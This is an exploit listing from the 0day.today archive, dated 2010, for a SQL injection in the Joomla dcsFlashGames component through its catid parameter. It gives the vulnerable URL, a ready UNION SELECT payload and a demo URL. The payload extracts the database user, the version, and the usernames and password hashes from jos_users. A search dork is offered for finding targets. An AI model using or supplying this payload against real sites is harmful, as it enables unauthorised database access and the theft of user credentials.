Joomla Component dcsFlashGames (catid) SQL Vulnerability

2010-03-26T00:00:00
ID 1337DAY-ID-11454
Type zdt
Reporter kaMtiEz
Modified 2010-03-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
Joomla Component dcsFlashGames (catid) SQL Vulnerability
========================================================


[!]===========================================================================[!]
 
[~] Joomla Component dcsFlashGames SQL Vulnerability ( catid )
[~] Author  : kaMtiEz ([email protected])
[~] Homepage    : http://www.indonesiancoder.com
[~] Date    : 25 March, 2010
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://ekith.com/
[+] Description : http://ext.joom.ru/dcsflashgames.html
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/project/sageth/frs/
[+] Version : 2.0RC1
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
 
http://127.0.0.1/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&catid=[INDONESIANCODER]
 
[ XpL ]
 
666+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--
 
 
[ d3m0 ]
 
http://server/index.php?option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--
 
 
etc etc etc ;]
 
[!]===========================================================================[!]



#  0day.today [2018-03-01]  #